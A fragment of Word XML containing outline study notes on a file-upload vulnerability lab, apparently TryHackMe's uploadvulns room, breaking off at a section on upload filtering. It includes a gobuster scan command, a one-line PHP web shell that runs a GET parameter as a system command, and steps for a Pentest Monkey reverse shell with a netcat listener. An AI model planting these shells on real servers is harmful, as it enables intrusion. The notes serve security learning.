          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Practical option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF4DA76" w14:textId="51F93AA8" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C1BF1" w14:textId="287AB76E" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ideal goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DBC065" w14:textId="00DF5DDD" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload and force run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142097C4" w14:textId="617253B7" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A028BE3" w14:textId="3F252259" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web page with upload form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA37C2A" w14:textId="17358E6B" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA55EDB" w14:textId="032DE62C" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://demo.uploadvulns.thm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/directory-</w:t>
      </w:r>
      <w:r w:rsidR="00F84C0C" w:rsidRPr="0084205E">
        <w:t>list-1.0.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3D844" w14:textId="364DA96C" w:rsidR="003E6E8C" w:rsidRPr="0084205E" w:rsidRDefault="003E6E8C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-e” – print full URLs in console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6964B5" w14:textId="320B05CF" w:rsidR="003E6E8C" w:rsidRPr="0084205E" w:rsidRDefault="003E6E8C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-U and -P – username and password for basic auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEAAAB7" w14:textId="160D212C" w:rsidR="003E6E8C" w:rsidRPr="0084205E" w:rsidRDefault="003E6E8C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-p &lt;x&gt;” = proxy to use for requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BE464A" w14:textId="56F963B1" w:rsidR="003E6E8C" w:rsidRPr="0084205E" w:rsidRDefault="003E6E8C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-c &lt;http cookies&gt;” – specify a cookie for simulating your auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560660C2" w14:textId="229970E6" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738CE61E" w14:textId="755ECA25" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Directories can be input in URL for navigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507DF489" w14:textId="4DDB1A87" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69959185" w14:textId="0C2A170C" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PHP good place to start, though some enumeration may be necessary in real life application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C2DB6F" w14:textId="7B2203E5" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Take a parameter and execute it as a system command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC7056" w14:textId="009DC38E" w:rsidR="007115F8" w:rsidRPr="0084205E" w:rsidRDefault="007115F8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create php script in text editor and save with .php extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30984458" w14:textId="17786CB5" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PHP syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF269D" w14:textId="7C06932F" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23497C52" w14:textId="252F216A" w:rsidR="00357B6B" w:rsidRPr="0084205E" w:rsidRDefault="00357B6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>echo system(</w:t>
      </w:r>
      <w:r w:rsidR="00F84C0C" w:rsidRPr="0084205E">
        <w:t>$_GET[“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F84C0C" w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F84C0C" w:rsidRPr="0084205E">
        <w:t>”]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F84C0C" w:rsidRPr="0084205E">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C219BE7" w14:textId="1BD742A7" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24CF58" w14:textId="33E67F17" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Takes a GET parameter and executes it as a system command, echoing output to screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA65B1D" w14:textId="5593BDC7" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shell can be used to read files from the system or upgrade to a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE45F82" w14:textId="2590DF6A" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, easier to view output by looking at the source code of the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D7B9BA" w14:textId="24679674" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503A7A0" w14:textId="2BD09882" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Similar process to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7774DC" w14:textId="6DE7157A" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pentest Monkey reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="552FD54B" w14:textId="11787FBC" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Edit line 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C919D9" w14:textId="311ACB6A" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Change 127 IP to THM tun0 IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA7A98" w14:textId="13448839" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Start netcat listening post </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472AA416" w14:textId="2F9F17B9" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Upload shell and activate by navigating to </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://demo.uploadvulns.thm/uploads/shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35C38F43" w14:textId="0B1AC867" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9967F" w14:textId="68913BC3" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Activate reverse shell by navigating to it and clicking on it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26397F" w14:textId="26AE8F2B" w:rsidR="00F84C0C" w:rsidRPr="0084205E" w:rsidRDefault="00F84C0C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Site should hang but be accessible via listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B72A9B" w14:textId="3F1E7242" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E121456" w14:textId="18D29CF7" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC7C90" w14:textId="08C26ED8" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Differences between client and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>server side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622FD15" w14:textId="4EE9E630" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E309E98" w14:textId="3E3BD378" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Web application is running in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C69A1" w14:textId="17ECBF07" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70692471" w14:textId="6664D08F" w:rsidR="009F1D23" w:rsidRPr="0084205E" w:rsidRDefault="009F1D23" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
